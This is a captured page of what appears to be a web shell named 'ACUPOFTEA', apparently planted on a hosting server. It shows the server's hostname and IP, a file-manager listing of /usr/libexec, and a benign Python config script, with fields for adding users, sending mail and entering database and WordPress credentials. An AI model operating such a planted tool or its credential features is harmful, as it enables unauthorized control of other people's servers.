System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
usr
/
libexec
/
216.73.216.50
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
platform-python3.6m-x86_64-config
#!/bin/sh # Keep this script in sync with python-config.in exit_with_usage () { echo "Usage: $0 --prefix|--exec-prefix|--includes|--libs|--cflags|--ldflags|--extension-suffix|--help|--abiflags|--configdir" exit $1 } if [ "$1" = "" ] ; then exit_with_usage 1 fi # Returns the actual prefix where this script was installed to. installed_prefix () { RESULT=$(dirname $(cd $(dirname "$1") && pwd -P)) if which readlink >/dev/null 2>&1 ; then if readlink -f "$RESULT" >/dev/null 2>&1; then RESULT=$(readlink -f "$RESULT") fi fi echo $RESULT } prefix_real=$(installed_prefix "$0") # Use sed to fix paths from their built-to locations to their installed-to # locations. Keep prefix & exec_prefix using their original values in case # they are referenced in other configure variables, to prevent double # substitution, issue #22140. prefix="/usr" exec_prefix="/usr" exec_prefix_real=${prefix_real} includedir=$(echo "/usr/include" | sed "s#$prefix#$prefix_real#") libdir=$(echo "/usr/lib64" | sed "s#$prefix#$prefix_real#") CFLAGS=$(echo " -O2 -g -pipe -Wall -Werror=format-security -Wp,-D_FORTIFY_SOURCE=2 -Wp,-D_GLIBCXX_ASSERTIONS -fexceptions -fstack-protector-strong -grecord-gcc-switches -m64 -mtune=generic -fasynchronous-unwind-tables -fstack-clash-protection -fcf-protection -D_GNU_SOURCE -fPIC -fwrapv " | sed "s#$prefix#$prefix_real#") VERSION="3.6" LIBM="-lm" LIBC="" SYSLIBS="$LIBM $LIBC" ABIFLAGS="m" LIBS="-lpython${VERSION}${ABIFLAGS} -lpthread -ldl -lutil $SYSLIBS" BASECFLAGS=" -Wno-unused-result -Wsign-compare" LDLIBRARY="libpython${LDVERSION}.so" LINKFORSHARED="-Xlinker -export-dynamic" OPT="-DDYNAMIC_ANNOTATIONS_ENABLED=1 -DNDEBUG -O2 -g -pipe -Wall -Werror=format-security -Wp,-D_FORTIFY_SOURCE=2 -Wp,-D_GLIBCXX_ASSERTIONS -fexceptions -fstack-protector-strong -grecord-gcc-switches -m64 -mtune=generic -fasynchronous-unwind-tables -fstack-clash-protection -fcf-protection -D_GNU_SOURCE -fPIC -fwrapv" PY_ENABLE_SHARED="1" LDVERSION="${VERSION}${ABIFLAGS}" LIBDEST=${prefix_real}/lib/python${VERSION} LIBPL=$(echo "${prefix}/lib64/python3.6/config-${VERSION}${ABIFLAGS}-x86_64-linux-gnu" | sed "s#$prefix#$prefix_real#") SO=".cpython-36m-x86_64-linux-gnu.so" PYTHONFRAMEWORK="" INCDIR="-I$includedir/python${VERSION}${ABIFLAGS}" PLATINCDIR="-I$includedir/python${VERSION}${ABIFLAGS}" # Scan for --help or unknown argument. for ARG in $* do case $ARG in --help) exit_with_usage 0 ;; --prefix|--exec-prefix|--includes|--libs|--cflags|--ldflags|--extension-suffix|--abiflags|--configdir) ;; *) exit_with_usage 1 ;; esac done for ARG in "$@" do case "$ARG" in --prefix) echo "$prefix_real" ;; --exec-prefix) echo "$exec_prefix_real" ;; --includes) echo "$INCDIR $PLATINCDIR" ;; --cflags) echo "$INCDIR $PLATINCDIR $BASECFLAGS $CFLAGS $OPT" ;; --libs) echo "$LIBS" ;; --ldflags) LINKFORSHAREDUSED= if [ -z "$PYTHONFRAMEWORK" ] ; then LINKFORSHAREDUSED=$LINKFORSHARED fi LIBPLUSED= if [ "$PY_ENABLE_SHARED" = "0" ] ; then LIBPLUSED="-L$LIBPL" fi echo "$LIBPLUSED -L$libdir $LIBS $LINKFORSHAREDUSED" ;; --extension-suffix) echo "$SO" ;; --abiflags) echo "$ABIFLAGS" ;; --configdir) echo "$LIBPL" ;; esac done
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2025-09-24 10:57:27
..
DIR
-
drwxr-xr-x
2025-06-28 07:14:01
awk
DIR
-
drwxr-xr-x
2024-03-13 04:20:09
coreutils
DIR
-
drwxr-xr-x
2024-03-13 04:20:17
dbus-1
DIR
-
drwxr-xr-x
2025-08-28 10:58:30
dovecot
DIR
-
drwxr-xr-x
2025-04-15 10:57:58
gawk
LINK
-
drwxr-xr-x
2024-03-13 04:20:09
gcc
DIR
-
drwxr-xr-x
2025-08-26 09:44:17
getconf
DIR
-
drwxr-xr-x
2025-08-28 10:58:29
grubby
DIR
-
drwxr-xr-x
2024-06-24 12:46:49
hostname
DIR
-
drwxr-xr-x
2024-03-13 04:21:16
imunify-notifier
DIR
-
drwxr-xr-x
2024-11-18 10:57:19
initscripts
DIR
-
drwxr-xr-x
2024-03-13 04:20:39
installkernel
DIR
-
drwxr-xr-x
2024-06-24 12:46:49
kcare
DIR
-
drwxr-xr-x
2025-10-03 10:57:22
linux-boot-probes
DIR
-
drwxr-xr-x
2024-03-13 04:20:24
man-db
DIR
-
drwxr-xr-x
2024-03-13 04:21:15
mc
DIR
-
drwxr-xr-x
2024-06-24 01:43:03
microcode_ctl
DIR
-
drwxr-xr-x
2025-07-16 10:59:09
nfs-utils
DIR
-
drwxr-xr-x
2025-06-05 10:57:18
openldap
DIR
-
drwxr-xr-x
2025-03-11 09:44:39
openssh
DIR
-
drwxr-xr-x
2025-10-01 10:57:23
os-prober
DIR
-
drwxr-xr-x
2024-03-13 04:20:24
os-probes
DIR
-
drwxr-xr-x
2024-03-13 04:20:24
p11-kit
DIR
-
drwxr-xr-x
2024-06-24 12:44:38
plymouth
DIR
-
drwxr-xr-x
2022-04-18 04:45:15
selinux
DIR
-
drwxr-xr-x
2025-06-03 02:06:53
smartmontools
DIR
-
drwxr-xr-x
2024-06-24 12:46:52
sssd
DIR
-
drwxr-xr-x
2025-06-05 10:57:18
sudo
DIR
-
drwxr-xr-x
2025-08-28 10:58:34
tuned
DIR
-
drwxr-xr-x
2025-03-12 10:58:31
utempter
DIR
-
drwxr-xr-x
2024-03-13 04:20:19
audit-functions
990 B
-rwxr-x---
2025-07-15 09:41:56
chrony-helper
text/x-shellscript
7.17 KB
-rwxr-xr-x
2024-11-05 07:44:41
dirmngr_ldap
application/x-sharedlib
87.32 KB
-rwxr-xr-x
2022-09-13 10:15:05
dnf-utils
text/x-python
3.62 KB
-rwxr-xr-x
2024-04-08 10:02:46
ebtables
text/x-shellscript
1.33 KB
-rwxr-xr-x
2024-04-02 06:37:41
exim.daemon
text/x-shellscript
758 B
-rwxr-xr-x
2025-05-12 05:54:51
generate-rndc-key.sh
text/x-shellscript
546 B
-rwxr-xr-x
2025-02-20 09:05:37
gpg-check-pattern
application/x-sharedlib
111.88 KB
-rwxr-xr-x
2022-09-13 10:15:05
gpg-preset-passphrase
application/x-sharedlib
87.21 KB
-rwxr-xr-x
2022-09-13 10:15:05
gpg-protect-tool
application/x-sharedlib
206.3 KB
-rwxr-xr-x
2022-09-13 10:15:05
gpg-wks-client
application/x-sharedlib
227.22 KB
-rwxr-xr-x
2022-09-13 10:15:05
grepconf.sh
text/x-shellscript
253 B
-rwxr-xr-x
2018-08-12 07:47:56
import-state
text/x-shellscript
1.03 KB
-rwxr-xr-x
2022-08-10 01:03:37
imunify-message-gateway
application/x-executable
5.93 MB
-rwxr-xr-x
2025-08-22 10:14:24
loadmodules
text/x-shellscript
233 B
-rwxr-xr-x
2022-08-10 01:03:37
nfsrahead
application/x-sharedlib
37.12 KB
-rwxr-xr-x
2025-06-04 10:54:29
nm-daemon-helper
application/x-sharedlib
12.6 KB
-rwxr-xr-x
2025-08-26 09:47:31
nm-dhcp-helper
application/x-sharedlib
16.2 KB
-rwxr-xr-x
2025-08-26 09:47:31
nm-dispatcher
application/x-sharedlib
66.16 KB
-rwxr-xr-x
2025-08-26 09:47:31
nm-initrd-generator
application/x-sharedlib
740.48 KB
-rwxr-xr-x
2025-08-26 09:47:31
no-python
text/x-shellscript
157 B
-rwxr-xr-x
2025-08-26 09:08:20
platform-python
application/x-sharedlib
11.59 KB
-rwxr-xr-x
2025-08-26 09:08:24
platform-python-config
text/x-shellscript
204 B
-rwxr-xr-x
2025-08-26 09:08:08
platform-python3.6
application/x-sharedlib
11.59 KB
-rwxr-xr-x
2025-08-26 09:08:24
platform-python3.6-config
text/x-shellscript
204 B
-rwxr-xr-x
2025-08-26 09:08:08
platform-python3.6m
application/x-sharedlib
11.59 KB
-rwxr-xr-x
2025-08-26 09:08:24
platform-python3.6m-config
text/x-shellscript
204 B
-rwxr-xr-x
2025-08-26 09:08:08
platform-python3.6m-x86_64-config
text/x-shellscript
3.54 KB
-rwxr-xr-x
2025-08-26 09:01:50
postgresql-check-db-dir
text/x-shellscript
3.19 KB
-rwxr-xr-x
2024-02-27 08:24:43
report-command-error
application/x-executable
8.06 MB
-rwxr-xr-x
2025-08-22 10:14:24
run-with-intensity
application/x-executable
6.1 MB
-rwxr-xr-x
2025-08-22 10:14:24
scdaemon
application/x-sharedlib
442.36 KB
-rwxr-xr-x
2022-09-13 10:15:05
tcawmgr.cgi
application/x-sharedlib
25.1 KB
-rwxr-xr-x
2019-10-13 01:22:36
virt-what-cpuid-helper
application/x-sharedlib
7.91 KB
-rwxr-xr-x
2023-10-14 08:52:07
~ ACUPOFTEA - mail.ontime-ae.com